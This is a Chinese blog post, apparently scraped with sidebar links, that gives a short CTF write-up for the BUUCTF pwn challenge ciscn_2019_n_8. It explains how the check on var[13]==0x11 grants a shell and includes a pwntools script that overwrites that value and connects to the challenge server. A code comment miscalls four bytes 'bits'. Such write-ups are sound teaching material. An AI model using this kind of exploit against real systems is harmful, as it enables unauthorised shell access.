当前位置:网站首页>buuctf pwn ciscn_2019_n_8
buuctf pwn ciscn_2019_n_8
2022-06-21 22:22:00 【[mzq]】
ciscn_2019_n_8
checksec 看一下基本信息
把程序拖到ida32分析一波,可以看到 scanf 读入字符串给了 var 然后后面的v4,v5没起作用,然后判断了var[13]是不是等于\x11,是就给一个shell
所以只要让我们输入的字符后13位等于 \x11
from pwn import *
io = process("./ciscn_2019_n_8")
io = remote("node4.buuoj.cn",29622)
context(log_level="debug",arch="i386")
payload = flat(["aaaa"*13,0x11]) # 因为32为是4个bit 所以说4个a
io.sendline(payload)
io.interactive()
边栏推荐
- Golang calls sdl2, plays PCM audio, and reports an error signal arrived during external code execution.
- [technical remarks] [reprint]analysis of several parameters of ffmpeg compressed video
- Programming dry goods │ PHP common method encapsulation
- pytorch可视化
- Binary sort tree
- Win11 hotspot connection successful but no network? Solution of win11 mobile hotspot and network conflict
- JUnit VS TestNG
- What is the fault when the router is connected but not connected to the network
- The ranking list of programming languages has been published in June, and this language should be "gods"
- 洞見數據價值,啟迪數字未來,《數字化的力量》問世
猜你喜欢
![[Database Course Design] classroom information management system based on SQL Server (with part of source code)](/img/7e/47011ee2a35c50669a86fd5cf543d9.png)
[Database Course Design] classroom information management system based on SQL Server (with part of source code)
6月编程语言排行榜已出,这门语言要“封神”
Component value transfer: value transfer between siblings (value transfer by non parent and child components)
Win11 how to change the desktop file path to disk D
Cvpr2022 𞓜 loss problem in weakly supervised multi label classification
ERP is dead, the management background is cold, and seckill system is king!
树莓派开发笔记(十五):树莓派4B+从源码编译安装mysql数据库
leetcode1337. 矩阵中战斗力最弱的K行
Student management system experiment report -asp Net programming
硬件开发笔记(四):硬件开发基本流程,制作一个USB转RS232的模块(三):设计原理图
随机推荐
Programming dry goods │ PHP common method encapsulation
JS listening and removing listening events
Win11 hotspot connection successful but no network? Solution of win11 mobile hotspot and network conflict
基于Arduino框架下VSCode PlatformIO一个项目配置两种不同开发板的兼容模式
使用CRD扩展Kubernetes API
Hardware development notes (III): basic process of hardware development, making a USB to RS232 module (II): design principle diagram Library
Go language learning tutorial (12)
今日睡眠质量记录81分
Reddit product director: a necessary NFT member practical guide for Web3 creators
布局路线图,空间布局与数据可视化的完美结合
Notes on the development of raspberry pie (15): Raspberry pie 4b+ compile and install MySQL database from the source code
How to uninstall windows SQL Server cleanly?
Enterprise comprehensive networking Training II
如何使用tensorboard add_histogram
Voir la valeur des données, éclairer l'avenir numérique, le pouvoir numérique est sorti
小程序与工业互联网是怎样相辅相成的
Online text batch inversion by line tool
Promise error capture processing -- promise Technology
Component value transfer: child components transfer data to parent components
Detailed explanation of C language [implicit type conversion] and [explicit type conversion]